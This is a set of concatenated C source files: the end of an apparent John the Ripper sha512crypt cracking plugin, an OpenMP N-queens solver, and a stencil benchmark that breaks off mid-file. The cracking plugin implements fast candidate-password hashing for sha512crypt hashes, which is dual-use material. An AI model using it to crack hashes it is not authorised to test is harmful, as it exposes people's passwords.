pstr->bufs[idx][14][tot_psc-2] = (len_psc<<3)>>8;
pstr->bufs[idx][14][tot_psc-1] = (len_psc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[15] ppc (from 3)
pstr->bufs[idx][15] = pstr->bufs[idx][3]; pstr->cptr[idx][14] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[15] = dlen_ppc;
// pstr->buf[16] cspp (from 2)
pstr->bufs[idx][16] = pstr->cptr[idx][15] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[16] = dlen_ppsc;
// pstr->buf[17] pspc (from 1)
pstr->bufs[idx][17] = pstr->bufs[idx][1]; pstr->cptr[idx][16] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[17] = dlen_ppsc;
// pstr->buf[18] cpp (from 6)
pstr->bufs[idx][18] = pstr->cptr[idx][17] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[18] = dlen_ppc;
// pstr->buf[19] pspc (from 1)
pstr->bufs[idx][19] = pstr->bufs[idx][1]; pstr->cptr[idx][18] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[19] = dlen_ppsc;
// pstr->buf[20] cspp (from 2)
pstr->bufs[idx][20] = pstr->cptr[idx][19] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[20] = dlen_ppsc;
// pstr->buf[21] pc (First of this type)
pstr->bufs[idx][21] = cp;
pstr->cptr[idx][20] = cp + off_pc;
memcpy(cp, p_bytes, plen); cp += (plen+BINARY_SIZE);
if (!idx) pstr->datlen[21] = dlen_pc;
memcpy(cp, padding, tot_psc-2-len_pc);
pstr->bufs[idx][21][tot_pc-2] = (len_pc<<3)>>8;
pstr->bufs[idx][21][tot_pc-1] = (len_pc<<3)&0xFF;
#ifdef SIMD_COEF_64
cp = next_cp;
next_cp = cp + (2*128*BLKS);
#endif
// pstr->buf[22] cspp (from 2)
pstr->bufs[idx][22] = pstr->cptr[idx][21] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[22] = dlen_ppsc;
// pstr->buf[23] pspc (from 1)
pstr->bufs[idx][23] = pstr->bufs[idx][1]; pstr->cptr[idx][22] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[23] = dlen_ppsc;
// pstr->buf[24] cpp (from 6)
pstr->bufs[idx][24] = pstr->cptr[idx][23] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[24] = dlen_ppc;
// pstr->buf[25] pspc (from 1)
pstr->bufs[idx][25] = pstr->bufs[idx][1]; pstr->cptr[idx][24] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[25] = dlen_ppsc;
// pstr->buf[26] cspp (from 2)
pstr->bufs[idx][26] = pstr->cptr[idx][25] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[26] = dlen_ppsc;
// pstr->buf[27] ppc (from 3)
pstr->bufs[idx][27] = pstr->bufs[idx][3]; pstr->cptr[idx][26] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[27] = dlen_ppc;
// pstr->buf[28] csp (from 14)
pstr->bufs[idx][28] = pstr->cptr[idx][27] = pstr->bufs[idx][14];
if (!idx) pstr->datlen[28] = dlen_psc;
// pstr->buf[29] pspc (from 1)
pstr->bufs[idx][29] = pstr->bufs[idx][1]; pstr->cptr[idx][28] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[29] = dlen_ppsc;
// pstr->buf[30] cpp (from 6)
pstr->bufs[idx][30] = pstr->cptr[idx][29] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[30] = dlen_ppc;
// pstr->buf[31] pspc (from 1)
pstr->bufs[idx][31] = pstr->bufs[idx][1]; pstr->cptr[idx][30] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[31] = dlen_ppsc;
// pstr->buf[32] cspp (from 2)
pstr->bufs[idx][32] = pstr->cptr[idx][31] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[32] = dlen_ppsc;
// pstr->buf[33] ppc (from 3)
pstr->bufs[idx][33] = pstr->bufs[idx][3]; pstr->cptr[idx][32] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[33] = dlen_ppc;
// pstr->buf[34] cspp (from 2)
pstr->bufs[idx][34] = pstr->cptr[idx][33] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[34] = dlen_ppsc;
// pstr->buf[35] psc (from 7)
pstr->bufs[idx][35] = pstr->bufs[idx][7]; pstr->cptr[idx][34] = pstr->cptr[idx][6];
if (!idx) pstr->datlen[35] = dlen_psc;
// pstr->buf[36] cpp (from 6)
pstr->bufs[idx][36] = pstr->cptr[idx][35] = pstr->bufs[idx][6];
if (!idx) pstr->datlen[36] = dlen_ppc;
// pstr->buf[37] pspc (from 1)
pstr->bufs[idx][37] = pstr->bufs[idx][1]; pstr->cptr[idx][36] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[37] = dlen_ppsc;
// pstr->buf[38] cspp (from 2)
pstr->bufs[idx][38] = pstr->cptr[idx][37] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[38] = dlen_ppsc;
// pstr->buf[39] ppc (from 3)
pstr->bufs[idx][39] = pstr->bufs[idx][3]; pstr->cptr[idx][38] = pstr->cptr[idx][2];
if (!idx) pstr->datlen[39] = dlen_ppc;
// pstr->buf[40] cspp (from 2)
pstr->bufs[idx][40] = pstr->cptr[idx][39] = pstr->bufs[idx][2];
if (!idx) pstr->datlen[40] = dlen_ppsc;
// pstr->buf[41] pspc (from 1)
pstr->bufs[idx][41] = pstr->bufs[idx][1]; pstr->cptr[idx][40] = pstr->cptr[idx][0];
if (!idx) pstr->datlen[41] = dlen_ppsc;
}
static int crypt_all(int *pcount, struct db_salt *salt)
{
const int count = *pcount;
int index = 0;
int *MixOrder, tot_todo;
#ifdef SIMD_COEF_64
// group based upon size splits.
MixOrder = mem_calloc((count+6*MAX_KEYS_PER_CRYPT), sizeof(int));
{
static const int lens[17][6] = {
{0,24,48,88,89,90}, // 0 byte salt
{0,24,48,88,89,90}, // 1 byte salt
{0,23,24,46,48,87}, // 2 byte salt
{0,23,24,45,48,87}, // 3 byte salt
{0,22,24,44,48,86}, // 4 byte salt
{0,22,24,43,48,86}, // 5 byte salt
{0,21,24,42,48,85}, // 6 byte salt
{0,21,24,41,48,85}, // 7 byte salt
{0,20,24,40,48,84}, // 8 byte salt
{0,20,24,39,48,84}, // 9 byte salt
{0,19,24,38,48,83}, // 10 byte salt
{0,19,24,37,48,83}, // 11 byte salt
{0,18,24,36,48,82}, // 12 byte salt
{0,18,24,35,48,82}, // 13 byte salt
{0,17,24,34,48,81}, // 14 byte salt
{0,17,24,33,48,81}, // 15 byte salt
{0,16,24,32,48,80} };
int j;
tot_todo = 0;
saved_len[count] = 0; // point all 'tail' MMX buffer elements to this location.
for (j = 0; j < 5; ++j) {
for (index = 0; index < count; ++index) {
if (saved_len[index] >= lens[cur_salt->len][j] && saved_len[index] < lens[cur_salt->len][j+1])
MixOrder[tot_todo++] = index;
}
while (tot_todo % MAX_KEYS_PER_CRYPT)
MixOrder[tot_todo++] = count;
}
}
#else
// no need to mix. just run them one after the next, in any order.
MixOrder = mem_calloc(count, sizeof(int));
for (index = 0; index < count; ++index)
MixOrder[index] = index;
tot_todo = count;
#endif
#ifdef _OPENMP
#pragma omp parallel for
#endif
for (index = 0; index < tot_todo; index += MAX_KEYS_PER_CRYPT)
{
// portably align temp_result char * pointer machine word size.
union xx {
unsigned char c[BINARY_SIZE];
ARCH_WORD a[BINARY_SIZE/sizeof(ARCH_WORD)];
} u;
unsigned char *temp_result = u.c;
SHA512_CTX ctx;
SHA512_CTX alt_ctx;
size_t cnt;
int idx;
char *cp;
char p_bytes[PLAINTEXT_LENGTH+1];
char s_bytes[PLAINTEXT_LENGTH+1];
char tmp_cls[sizeof(cryptloopstruct)+MEM_ALIGN_SIMD];
cryptloopstruct *crypt_struct;
#ifdef SIMD_COEF_64
char tmp_sse_out[8*MAX_KEYS_PER_CRYPT*8+MEM_ALIGN_SIMD];
uint64_t *sse_out;
sse_out = (uint64_t *)mem_align(tmp_sse_out, MEM_ALIGN_SIMD);
#endif
crypt_struct = (cryptloopstruct *)mem_align(tmp_cls,MEM_ALIGN_SIMD);
for (idx = 0; idx < MAX_KEYS_PER_CRYPT; ++idx)
{
/* Prepare for the real work. */
SHA512_Init(&ctx);
/* Add the key string. */
SHA512_Update(&ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* The last part is the salt string. This must be at most 16
characters and it ends at the first `$' character (for
compatibility with existing implementations). */
SHA512_Update(&ctx, cur_salt->salt, cur_salt->len);
/* Compute alternate SHA512 sum with input KEY, SALT, and KEY. The
final result will be added to the first context. */
SHA512_Init(&alt_ctx);
/* Add key. */
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Add salt. */
SHA512_Update(&alt_ctx, cur_salt->salt, cur_salt->len);
/* Add key again. */
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Now get result of this (64 bytes) and add it to the other
context. */
SHA512_Final((unsigned char*)crypt_out[MixOrder[index+idx]], &alt_ctx);
/* Add for any character in the key one byte of the alternate sum. */
for (cnt = saved_len[MixOrder[index+idx]]; cnt > BINARY_SIZE; cnt -= BINARY_SIZE)
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], BINARY_SIZE);
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], cnt);
/* Take the binary representation of the length of the key and for every
1 add the alternate sum, for every 0 the key. */
for (cnt = saved_len[MixOrder[index+idx]]; cnt > 0; cnt >>= 1)
if ((cnt & 1) != 0)
SHA512_Update(&ctx, (unsigned char*)crypt_out[MixOrder[index+idx]], BINARY_SIZE);
else
SHA512_Update(&ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Create intermediate result. */
SHA512_Final((unsigned char*)crypt_out[MixOrder[index+idx]], &ctx);
/* Start computation of P byte sequence. */
SHA512_Init(&alt_ctx);
/* For every character in the password add the entire password. */
for (cnt = 0; cnt < saved_len[MixOrder[index+idx]]; ++cnt)
SHA512_Update(&alt_ctx, (unsigned char*)saved_key[MixOrder[index+idx]], saved_len[MixOrder[index+idx]]);
/* Finish the digest. */
SHA512_Final(temp_result, &alt_ctx);
/* Create byte sequence P. */
cp = p_bytes;
for (cnt = saved_len[MixOrder[index+idx]]; cnt >= BINARY_SIZE; cnt -= BINARY_SIZE)
cp = (char *) memcpy (cp, temp_result, BINARY_SIZE) + BINARY_SIZE;
memcpy (cp, temp_result, cnt);
/* Start computation of S byte sequence. */
SHA512_Init(&alt_ctx);
/* repeat the following 16+A[0] times, where A[0] represents the
first byte in digest A interpreted as an 8-bit unsigned value */
for (cnt = 0; cnt < 16 + ((unsigned char*)crypt_out[MixOrder[index+idx]])[0]; ++cnt)
SHA512_Update(&alt_ctx, cur_salt->salt, cur_salt->len);
/* Finish the digest. */
SHA512_Final(temp_result, &alt_ctx);
/* Create byte sequence S. */
cp = s_bytes;
for (cnt = cur_salt->len; cnt >= BINARY_SIZE; cnt -= BINARY_SIZE)
cp = (char *) memcpy (cp, temp_result, BINARY_SIZE) + BINARY_SIZE;
memcpy (cp, temp_result, cnt);
/* Repeatedly run the collected hash value through SHA512 to
burn CPU cycles. */
LoadCryptStruct(crypt_struct, MixOrder[index+idx], idx, p_bytes, s_bytes);
}
idx = 0;
#ifdef SIMD_COEF_64
for (cnt = 1; ; ++cnt) {
if (crypt_struct->datlen[idx]==256) {
unsigned char *cp = crypt_struct->bufs[0][idx];
SIMDSHA512body((__m128i *)cp, sse_out, NULL, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK);
SIMDSHA512body((__m128i *)&cp[128], sse_out, sse_out, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK|SSEi_RELOAD);
} else {
unsigned char *cp = crypt_struct->bufs[0][idx];
SIMDSHA512body((__m128i *)cp, sse_out, NULL, SSEi_FLAT_IN|SSEi_2BUF_INPUT_FIRST_BLK);
}
if (cnt == cur_salt->rounds)
break;
{
int j, k;
for (k = 0; k < MAX_KEYS_PER_CRYPT; ++k) {
uint64_t *o = (uint64_t *)crypt_struct->cptr[k][idx];
#if !ARCH_ALLOWS_UNALIGNED
if (!is_aligned(o, 8)) {
unsigned char *cp = (unsigned char*)o;
for (j = 0; j < 64; ++j)
*cp++ = ((unsigned char*)sse_out)[GETPOS(j, k)];
} else
#endif
for (j = 0; j < 8; ++j)
#if ARCH_LITTLE_ENDIAN==1
*o++ = JOHNSWAP64(sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64]);
#else
*o++ = sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64];
#endif
}
}
if (++idx == 42)
idx = 0;
}
{
int j, k;
for (k = 0; k < MAX_KEYS_PER_CRYPT; ++k) {
uint64_t *o = (uint64_t *)crypt_out[MixOrder[index+k]];
for (j = 0; j < 8; ++j)
#if ARCH_LITTLE_ENDIAN==1
*o++ = JOHNSWAP64(sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64]);
#else
*o++ = sse_out[j*SIMD_COEF_64+(k&(SIMD_COEF_64-1))+k/SIMD_COEF_64*8*SIMD_COEF_64];
#endif
}
}
#else
SHA512_Init(&ctx);
for (cnt = 1; ; ++cnt) {
// calling with 128 byte, or 256 byte always, will force the update to properly crypt the data.
// NOTE the data is fully formed. It ends in a 0x80, is padded with nulls, AND has bit appended.
SHA512_Update(&ctx, crypt_struct->bufs[0][idx], crypt_struct->datlen[idx]);
if (cnt == cur_salt->rounds)
break;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Final(crypt_struct->cptr[0][idx], &ctx);
#else // !defined JTR_INC_COMMON_CRYPTO_SHA2, so it is oSSL, or generic
#if ARCH_LITTLE_ENDIAN
{
int j;
uint64_t *o = (uint64_t *)crypt_struct->cptr[0][idx];
for (j = 0; j < 8; ++j)
*o++ = JOHNSWAP64(ctx.h[j]);
}
#else
memcpy(crypt_struct->cptr[0][idx], ctx.h, BINARY_SIZE);
#endif
#endif
if (++idx == 42)
idx = 0;
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Init(&ctx);
#else
// this memcpy is 'good enough', used instead of SHA512_Init()
memcpy(ctx.h, ctx_init, sizeof(ctx_init));
#endif
}
#ifdef JTR_INC_COMMON_CRYPTO_SHA2
SHA512_Final((unsigned char*)crypt_out[MixOrder[index]], &ctx);
#else
#if ARCH_LITTLE_ENDIAN
{
int j;
uint64_t *o = (uint64_t *)crypt_out[MixOrder[index]];
for (j = 0; j < 8; ++j)
*o++ = JOHNSWAP64(ctx.h[j]);
}
#else
memcpy(crypt_out[MixOrder[index]], ctx.h, BINARY_SIZE);
#endif
#endif
#endif
}
MEM_FREE(MixOrder);
return count;
}
static void set_salt(void *salt)
{
cur_salt = salt;
}
static void *get_salt(char *ciphertext)
{
static struct saltstruct out;
int len;
memset(&out, 0, sizeof(out));
out.rounds = ROUNDS_DEFAULT;
ciphertext += FORMAT_TAG_LEN;
if (!strncmp(ciphertext, ROUNDS_PREFIX,
sizeof(ROUNDS_PREFIX) - 1)) {
const char *num = ciphertext + sizeof(ROUNDS_PREFIX) - 1;
char *endp;
unsigned long int srounds = strtoul(num, &endp, 10);
if (*endp == '$')
{
ciphertext = endp + 1;
srounds = srounds < ROUNDS_MIN ?
ROUNDS_MIN : srounds;
out.rounds = srounds > ROUNDS_MAX ?
ROUNDS_MAX : srounds;
}
}
for (len = 0; ciphertext[len] != '$'; len++);
if (len > SALT_LENGTH)
len = SALT_LENGTH;
memcpy(out.salt, ciphertext, len);
out.len = len;
return &out;
}
static int cmp_all(void *binary, int count)
{
int index = 0;
for (; index < count; index++)
if (!memcmp(binary, crypt_out[index], ARCH_SIZE))
return 1;
return 0;
}
static int cmp_one(void *binary, int index)
{
return !memcmp(binary, crypt_out[index], BINARY_SIZE);
}
static int cmp_exact(char *source, int index)
{
return 1;
}
static unsigned int sha512crypt_iterations(void *salt)
{
struct saltstruct *sha512crypt_salt;
sha512crypt_salt = salt;
return (unsigned int)sha512crypt_salt->rounds;
}
// Public domain hash function by DJ Bernstein
// We are hashing the entire struct
static int salt_hash(void *salt)
{
unsigned char *s = salt;
unsigned int hash = 5381;
unsigned int i;
for (i = 0; i < SALT_SIZE; i++)
hash = ((hash << 5) + hash) ^ s[i];
return hash & (SALT_HASH_SIZE - 1);
}
struct fmt_main fmt_cryptsha512 = {
{
FORMAT_LABEL,
FORMAT_NAME,
"SHA512 " ALGORITHM_NAME,
BENCHMARK_COMMENT,
BENCHMARK_LENGTH,
0,
PLAINTEXT_LENGTH,
BINARY_SIZE,
BINARY_ALIGN,
SALT_SIZE,
SALT_ALIGN,
MIN_KEYS_PER_CRYPT,
MAX_KEYS_PER_CRYPT,
FMT_CASE | FMT_8_BIT | FMT_OMP,
{
"iteration count",
},
{ FORMAT_TAG },
tests
}, {
init,
done,
fmt_default_reset,
fmt_default_prepare,
valid,
fmt_default_split,
get_binary,
get_salt,
{
sha512crypt_iterations,
},
fmt_default_source,
{
fmt_default_binary_hash_0,
fmt_default_binary_hash_1,
fmt_default_binary_hash_2,
fmt_default_binary_hash_3,
fmt_default_binary_hash_4,
fmt_default_binary_hash_5,
fmt_default_binary_hash_6
},
salt_hash,
NULL,
set_salt,
set_key,
get_key,
fmt_default_clear_keys,
crypt_all,
{
#define COMMON_GET_HASH_LINK
#include "common-get-hash.h"
},
cmp_all,
cmp_one,
cmp_exact
}
};
#endif /* plugin stanza */
|
main.c | #include <omp.h>
#include <stdio.h>
#include <stdint.h>
#define MAX_N 16
char BLOCK[MAX_N*MAX_N];
inline int abs(int x) {
// mask of sign bit
uint32_t y = x >> 31;
// toggle the sign bit
x ^= y;
// add 1 if x is negative (2's complement)
x += y & 1;
return x;
}
int place(int board[], int N, int row, int col) {
if (BLOCK[row*N + col] == '*') {
// blockage
return 0;
}
for (int i = 0; i < row; i++) {
if (board[i] == col) {
// column conflict
return 0;
} else if (abs(board[i] - col) == abs(i-row)) {
// diagonal conflict
return 0;
}
}
return 1;
}
int _queen(int board[], int r, int N, int count) {
for (int c = 0; c < N; c++) {
//printf("r=%d, c=%d\n", row, c);
if (place(board, N, r, c)) {
board[r] = c;
if (r == N-1) {
//printf(".. found!\n");
count++;
} else {
//printf(".. deeper\n");
count = _queen(board, r+1, N, count);
}
}
}
return count;
}
int queen(int N) {
int count = 0;
int board[MAX_N] = {0};
#pragma omp parallel for collapse(3) \
firstprivate(board) \
reduction(+ : count) \
schedule(dynamic)
for (int i = 0; i < N; i++) {
for (int j = 0; j < N; j++) {
for (int k = 0; k < N; k++) {
if (!place(board, N, 0, i)) {
continue;
}
board[0] = i;
if (!place(board, N, 1, j)) {
continue;
}
board[1] = j;
if (!place(board, N, 2, k)) {
continue;
}
board[2] = k;
count += _queen(board, 3, N, 0);
}
}
}
return count;
//return _queen(0, N, 0);
}
int main(void) {
int N, n_case = 0;
while (scanf("%d", &N) != EOF) {
n_case++;
for (int i = 0; i < N*N; i += N) {
scanf("%s", &BLOCK[i]);
}
/*
for (int i = 0; i < N*N; i++) {
printf("%c ", BLOCK[i]);
if ((i+1)%N == 0) {
printf("\n");
}
}
*/
printf("Case %d: %d\n", n_case, queen(N));
}
return 0;
}
|
3d25pt.lbpar.c | #include <omp.h>
#include <math.h>
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define max(x,y) ((x) > (y)? (x) : (y))
#define min(x,y) ((x) < (y)? (x) : (y))
/*
* Order-2, 3D 25 point stencil
* Adapted from PLUTO and Pochoir test bench
*
* Tareq Malas
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#ifdef LIKWID_PERFMON
#include <likwid.h>
#endif
#include "print_utils.h"
#define TESTS 2
#define MAX(a,b) ((a) > (b) ? a : b)
#define MIN(a,b) ((a) < (b) ? a : b)
#ifndef min
#define min(x,y) ((x) < (y)? (x) : (y))
#endif
/* Subtract the `struct timeval' values X and Y,
* storing the result in RESULT.
*
* Return 1 if the difference is negative, otherwise 0.
*/
int timeval_subtract(struct timeval *result, struct timeval *x, struct timeval *y)
{
/* Perform the carry for the later subtraction by updating y. */
if (x->tv_usec < y->tv_usec)
{
int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
y->tv_usec -= 1000000 * nsec;
y->tv_sec += nsec;
}
if (x->tv_usec - y->tv_usec > 1000000)
{
int nsec = (x->tv_usec - y->tv_usec) / 1000000;
y->tv_usec += 1000000 * nsec;
y->tv_sec -= nsec;
}
/* Compute the time remaining to wait.
* tv_usec is certainly positive.
*/
result->tv_sec = x->tv_sec - y->tv_sec;
result->tv_usec = x->tv_usec - y->tv_usec;
/* Return 1 if result is negative. */
return x->tv_sec < y->tv_sec;
}
int main(int argc, char *argv[])
{
int t, i, j, k, test;
int Nx, Ny, Nz, Nt;
if (argc > 3) {
Nx = atoi(argv[1])+8;
Ny = atoi(argv[2])+8;
Nz = atoi(argv[3])+8;
}
if (argc > 4)
Nt = atoi(argv[4]);
double ****A = (double ****) malloc(sizeof(double***)*2);
double ***roc2 = (double ***) malloc(sizeof(double**));
A[0] = (double ***) malloc(sizeof(double**)*Nz);
A[1] = (double ***) malloc(sizeof(double**)*Nz);
roc2 = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
A[0][i] = (double**) malloc(sizeof(double*)*Ny);
A[1][i] = (double**) malloc(sizeof(double*)*Ny);
roc2[i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
A[0][i][j] = (double*) malloc(sizeof(double)*Nx);
A[1][i][j] = (double*) malloc(sizeof(double)*Nx);
roc2[i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
// tile size information, including extra element to decide the list length
int *tile_size = (int*) malloc(sizeof(int));
tile_size[0] = -1;
// The list is modified here before source-to-source transformations
tile_size = (int*) realloc((void *)tile_size, sizeof(int)*5);
tile_size[0] = 24;
tile_size[1] = 24;
tile_size[2] = 8;
tile_size[3] = 64;
tile_size[4] = -1;
// for timekeeping
int ts_return = -1;
struct timeval start, end, result;
double tdiff = 0.0, min_tdiff=1.e100;
const int BASE = 1024;
// initialize variables
//
srand(42);
for (i = 1; i < Nz; i++) {
for (j = 1; j < Ny; j++) {
for (k = 1; k < Nx; k++) {
A[0][i][j][k] = 1.0 * (rand() % BASE);
roc2[i][j][k] = 2.0 * (rand() % BASE);
}
}
}
#ifdef LIKWID_PERFMON
LIKWID_MARKER_INIT;
#pragma omp parallel
{
LIKWID_MARKER_THREADINIT;
#pragma omp barrier
LIKWID_MARKER_START("calc");
}
#endif
int num_threads = 1;
#if defined(_OPENMP)
num_threads = omp_get_max_threads();
#endif
const double coef0 = -0.28472;
const double coef1 = 0.16000;
const double coef2 = -0.02000;
const double coef3 = 0.00254;
const double coef4 = -0.00018;
for(test=0; test<TESTS; test++){
gettimeofday(&start, 0);
// serial execution - Addition: 6 && Multiplication: 2
/* Copyright (C) 1991-2014 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
/* This header is separate from features.h so that the compiler can
include it implicitly at the start of every compilation. It must
not itself include <features.h> or any other header that includes
<features.h> because the implicit include comes before any feature
test macros that may be defined in a source file before it first
explicitly includes a system header. GCC knows the name of this
header in order to preinclude it. */
/* glibc's intent is to support the IEC 559 math functionality, real
and complex. If the GCC (4.9 and later) predefined macros
specifying compiler intent are available, use them to determine
whether the overall intent is to support these features; otherwise,
presume an older compiler has intent to support these features and
define these macros by default. */
/* wchar_t uses ISO/IEC 10646 (2nd ed., published 2011-03-15) /
Unicode 6.0. */
/* We do not support C11 <threads.h>. */
int t1, t2, t3, t4, t5, t6, t7, t8;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
/* Start of CLooG code */
if ((Nt >= 1) && (Nx >= 9) && (Ny >= 9) && (Nz >= 9)) {
for (t1=-1;t1<=floord(Nt-1,3);t1++) {
lbp=max(ceild(t1,2),ceild(6*t1-Nt+2,6));
ubp=min(floord(4*Nt+Nz-9,24),floord(12*t1+Nz+6,24));
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6,t7,t8)
for (t2=lbp;t2<=ubp;t2++) {
for (t3=max(max(max(0,ceild(3*t1,2)),ceild(24*t2-Nz+5,8)),3*t1-3*t2+1);t3<=min(min(min(floord(4*Nt+Ny-9,8),floord(12*t1+Ny+15,8)),floord(24*t2+Ny+11,8)),floord(24*t1-24*t2+Nz+Ny+13,8));t3++) {
for (t4=max(max(max(max(0,ceild(3*t1-3*t2-6,8)),ceild(3*t1-14,16)),ceild(24*t2-Nz-51,64)),ceild(8*t3-Ny-51,64));t4<=min(min(min(min(floord(4*Nt+Nx-9,64),floord(12*t1+Nx+15,64)),floord(24*t2+Nx+11,64)),floord(8*t3+Nx-5,64)),floord(24*t1-24*t2+Nz+Nx+13,64));t4++) {
for (t5=max(max(max(max(max(0,ceild(24*t2-Nz+5,4)),ceild(8*t3-Ny+5,4)),ceild(64*t4-Nx+5,4)),3*t1),6*t1-6*t2+1);t5<=min(min(min(min(min(floord(24*t1-24*t2+Nz+18,4),2*t3),Nt-1),3*t1+5),6*t2+4),16*t4+14);t5++) {
for (t6=max(max(24*t2,4*t5+4),-24*t1+24*t2+8*t5-23);t6<=min(min(24*t2+23,-24*t1+24*t2+8*t5),4*t5+Nz-5);t6++) {
for (t7=max(8*t3,4*t5+4);t7<=min(8*t3+7,4*t5+Ny-5);t7++) {
lbv=max(64*t4,4*t5+4);
ubv=min(64*t4+63,4*t5+Nx-5);
#pragma ivdep
#pragma vector always
for (t8=lbv;t8<=ubv;t8++) {
A[( t5 + 1) % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8)] = (((2.0 * A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8)]) - A[( t5 + 1) % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8)]) + (roc2[ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8)] * (((((coef0 * A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8)]) + (coef1 * (((((A[ t5 % 2][ (-4*t5+t6) - 1][ (-4*t5+t7)][ (-4*t5+t8)] + A[ t5 % 2][ (-4*t5+t6) + 1][ (-4*t5+t7)][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) - 1][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) + 1][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) - 1]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) + 1]))) + (coef2 * (((((A[ t5 % 2][ (-4*t5+t6) - 2][ (-4*t5+t7)][ (-4*t5+t8)] + A[ t5 % 2][ (-4*t5+t6) + 2][ (-4*t5+t7)][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) - 2][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) + 2][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) - 2]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) + 2]))) + (coef3 * (((((A[ t5 % 2][ (-4*t5+t6) - 3][ (-4*t5+t7)][ (-4*t5+t8)] + A[ t5 % 2][ (-4*t5+t6) + 3][ (-4*t5+t7)][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) - 3][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) + 3][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) - 3]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) + 3]))) + (coef4 * (((((A[ t5 % 2][ (-4*t5+t6) - 4][ (-4*t5+t7)][ (-4*t5+t8)] + A[ t5 % 2][ (-4*t5+t6) + 4][ (-4*t5+t7)][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) - 4][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7) + 4][ (-4*t5+t8)]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) - 4]) + A[ t5 % 2][ (-4*t5+t6)][ (-4*t5+t7)][ (-4*t5+t8) + 4])))));;
}
}
}
}
}
}
}
}
}
/* End of CLooG code */
gettimeofday(&end, 0);
ts_return = timeval_subtract(&result, &end, &start);
tdiff = (double) (result.tv_sec + result.tv_usec * 1.0e-6);
